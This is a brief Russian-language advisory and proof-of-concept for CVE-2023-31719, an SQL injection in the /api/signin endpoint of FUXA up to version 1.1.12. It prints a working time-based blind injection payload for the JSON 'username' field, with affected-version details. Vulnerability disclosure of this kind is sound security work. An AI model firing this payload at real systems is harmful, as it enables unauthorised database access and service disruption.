
Эксплойт proof-of-concept для CVE-2023-31719, демонстрирующий SQL-инъекцию в конечной точке /api/signin веб-приложения FUXA через изменённый параметр имени пользователя в формате JSON.
Возможно внедрение SQL-кода в JSON-параметр "username" из точки входа /api/signin через HTTP POST-запрос
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}
Название затронутого продукта: FUXA
Затронутая версия: <= 1.1.12
Проблема: SQL Injection
Описание: Возможно внедрение SQL-кода в JSON-параметр "username" из точки входа /api/signin через HTTP POST-запрос